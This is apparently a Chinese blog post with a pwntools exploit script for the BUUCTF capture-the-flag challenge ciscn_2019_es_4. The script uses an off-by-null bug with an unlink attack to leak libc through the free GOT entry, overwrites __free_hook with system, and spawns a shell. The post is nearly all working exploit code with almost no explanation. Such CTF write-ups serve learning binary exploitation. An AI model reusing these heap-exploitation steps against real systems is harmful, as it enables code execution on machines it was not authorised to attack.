0
点赞
收藏
分享

微信扫一扫

BUUCTF ciscn_2019_es_4

转角一扇门 2022-09-09 阅读 34

off-by-null + unlink

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

s = process('./ciscn_2019_es_4')
#s = remote('node4.buuoj.cn',25370)
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
elf = ELF('./ciscn_2019_es_4')

def add(index,size,content):
s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(index))
s.sendlineafter(b'size:\n' , str(size))
s.sendafter(b'content:\n' , content)

def delete(index):
s.sendlineafter(b'4.show\n' , b'2')
s.sendlineafter(b'index:\n' , str(index))

def edit(index,content):
s.sendlineafter(b'4.show\n' , b'3')
s.sendlineafter(b'index:\n' , str(index))
s.sendafter(b'content:\n' , content)

def show(index):
s.sendlineafter(b'4.show\n' , b'4')
s.sendlineafter(b'index:\n' , str(index))

target = 0x6020E0 + 8 * 7
fd = target - 0x18
bk = target - 0x10

key2_addr = 0x6022B8

for i in range(7):
add(i , 0xf0 , b'a') # 0-6

s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(7))
s.sendlineafter(b'size:\n' , str(0x88))
s.recvuntil(b'gift: ')
heap_addr = int(s.recv(7),16)
success('heap_addr=>' + hex(heap_addr))
s.sendafter(b'content:\n' , b'a') # 7

add(8 , 0xf0 , b'a') # 8
add(9 , 0x80 , b'a') # 9
add(10 , 0x80 , b'a') # 10
add(11 , 0x80 , b'/bin/sh\x00') # 11

for i in range(7):
delete(i)


payload = p64(0) + p64(0x81)
payload+= p64(fd) + p64(bk)
payload+= b'\x00'*0x60
payload+= p64(0x80)

edit(7 , payload)
delete(8)

payload = p64(heap_addr + 0x190) + p64(heap_addr + 0x190)
payload+= p64(elf.got['free']) + p64(0x602100)

edit(7 , payload)

delete(4)
delete(5)

add(4 , 0x80 , p64(key2_addr)) # 4
add(5 , 0x80 , p64(key2_addr)) # 5
add(8 , 0x80 , p64(0xfffffff)) # 8

show(6)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['free']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']


edit(7 , p64(__free_hook))
edit(4 , p64(system_addr))
delete(11)

#gdb.attach(s)

 


作者:{狒猩橙}



举报

相关推荐

0 条评论